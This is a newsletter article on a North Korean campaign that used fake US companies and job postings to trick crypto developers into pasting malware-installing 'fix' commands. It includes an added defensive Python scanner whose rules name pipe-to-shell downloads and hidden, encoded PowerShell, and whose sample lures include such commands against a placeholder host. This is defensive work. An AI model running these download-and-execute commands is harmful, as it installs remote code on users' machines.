AInvest Newsletter
North Korean hackers have established companies in the United States to target cryptocurrency developers, using these fake entities to distribute malware through fraudulent job postings. The hackers created three businesses: Blocknovas, Softglide, and Angeloper Agency. Blocknovas and Softglide were registered as legal entities, while Angeloper Agency was not. These companies were used to lure potential victims into clicking on malicious links, which then infected their computers with crypto-stealing malware.

The attack chain was built on social engineering. The hackers posted fake job listings on third-party websites aimed at crypto developers. Part way through the application process a staged error message would appear, instructing the applicant to click through and then copy and paste a "fix" onto their own machine; running that pasted content is what delivered the infection. The malware used in this campaign included BeaverTail, Invisible Ferret, and OtterCookie. BeaverTail was used to steal information and to stage further payloads, while Invisible Ferret and OtterCookie were designed to steal crypto keys and clipboard data.
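The lure above ends with the applicant pasting a "fix" command into a terminal or Run dialog. The following scanner is an added example, not code from the article or from Silent Push: it triages a pasted command against traits that such commands commonly share (pipe-to-shell downloads, encoded or hidden PowerShell, LOLBin downloaders, inline decode-and-execute). The rule set, the sample commands and the `example.invalid` host are constructed for illustration and are not indicators from this campaign.

```python
"""Heuristic triage for 'paste this to fix the error' commands.

Added example, not from the article. The patterns below are assumptions
based on common practice, not indicators recovered from this campaign.
"""
import re
from dataclasses import dataclass, field


@dataclass
class Verdict:
    suspicious: bool
    reasons: list = field(default_factory=list)


# Each rule is (name, compiled regex). Matched case-insensitively against the
# whole paste so multi-line clipboard contents are covered.
RULES = [
    # A fetch whose output is piped straight into an interpreter.
    ("pipe-to-interpreter",
     re.compile(r"\b(curl|wget|iwr|invoke-webrequest)\b[^|\n]*\|\s*"
                r"(sh|bash|zsh|iex|invoke-expression|node|python\d?)\b", re.I)),
    # PowerShell given a base64-encoded script body.
    ("encoded-powershell",
     re.compile(r"powershell(\.exe)?[^\n]*\s-(e|ec|enc|encodedcommand)\s+"
                r"[A-Za-z0-9+/=]{20,}", re.I)),
    # Window hidden so the victim sees nothing run.
    ("hidden-window", re.compile(r"-(w|windowstyle)\s+hidden\b", re.I)),
    # Script execution policy switched off for this invocation.
    ("execution-policy-bypass",
     re.compile(r"-(ep|executionpolicy)\s+bypass\b", re.I)),
    # Built-in Windows binaries abused as downloaders/launchers.
    ("lolbin-downloader",
     re.compile(r"\b(mshta|certutil\s+-urlcache|bitsadmin\s+/transfer|"
                r"regsvr32\s+/s\s+/i)\b", re.I)),
    # Inline base64 decode whose result is fed to a shell.
    ("inline-decode-to-shell",
     re.compile(r"base64\s+(-d|--decode)[^\n]*\|\s*(sh|bash|zsh)\b", re.I)),
    # One-liner in node/python that reaches out to a remote URL.
    ("eval-of-remote-code",
     re.compile(r"\b(node\s+-e|python\d?\s+-c)\b[^\n]*"
                r"(https?://|fetch\(|urlopen)", re.I)),
]


def triage(command: str) -> Verdict:
    """Return every rule that fires for a pasted command.

    An empty reason list means the command was not flagged; it does not mean
    the command is safe, so callers should treat this as a first filter only.
    """
    reasons = [name for name, rx in RULES if rx.search(command)]
    return Verdict(suspicious=bool(reasons), reasons=reasons)


# Constructed samples: two shaped like a paste-to-fix lure, two benign.
SAMPLES = {
    "lure-unix": "curl -fsSL https://example.invalid/fix.sh | bash",
    "lure-windows": ("powershell -w hidden -ep bypass -enc "
                     "SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAKQA="),
    "benign-npm": "npm install && npm test",
    "benign-git": "git clone https://example.invalid/repo.git",
}


def triage_all(samples: dict) -> dict:
    """Map each sample name to its list of fired rule names."""
    return {name: triage(cmd).reasons for name, cmd in samples.items()}


if __name__ == "__main__":
    for name, reasons in triage_all(SAMPLES).items():
        print(f"{name:14s} {'FLAG' if reasons else 'ok  '} {reasons}")
```

The scanner is deliberately narrow: it answers "does this paste look like an installer?" rather than "is this malware?", which keeps false positives on ordinary developer commands low while still catching the shape of a copy-and-run lure.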
The FBI seized Blocknovas' website and replaced it with a notice warning visitors about the malicious activity conducted through the site. The hackers used GitHub job listings and freelancer websites to find victims, and they used AI-generated images to build profiles of fake employees for the shell companies. In some cases they took images of real people and ran them through AI image-modification tools to produce subtly altered versions, which made the fake staff harder to trace back to their source photos.
This malware campaign has been ongoing since 2024 and has known public victims. Silent Push, a threat analysis firm, identified two developers targeted by the campaign; one of them reportedly had their MetaMask wallet compromised. The Lazarus Group, a North Korean state-sponsored hacking group, is suspected to be behind the campaign. The group is known for some of the biggest cyber thefts in the Web3 space, including the $1.4 billion Bybit hack and the $600 million Ronin network hack. The hackers' ability to register seemingly legitimate companies on U.S. soil highlights how difficult it is to combat this kind of state-backed activity.
American officials say this hacking activity is part of a broader pattern of North Korean hackers stealing funds to raise hard currency. The hackers target cryptocurrency because the proceeds can be moved and laundered with relative ease, and the funds are used to support North Korea's nuclear programs. The strategy has been very successful, with large-scale thefts occurring regularly. The Office of Foreign Assets Control (OFAC) has sanctioned North Korea over its nuclear weapons programme, and any American business that deals with North Korea is in breach of those sanctions, which is one reason the shell companies are a problem for anyone who unknowingly did business with them. The incident adds another layer of concern for crypto investors: the same properties that secure legitimate funds (pseudonymous addresses and irreversible transfers) also secure a thief's stolen funds. Demand for security experts in the crypto field is likely to grow as these breaches continue.
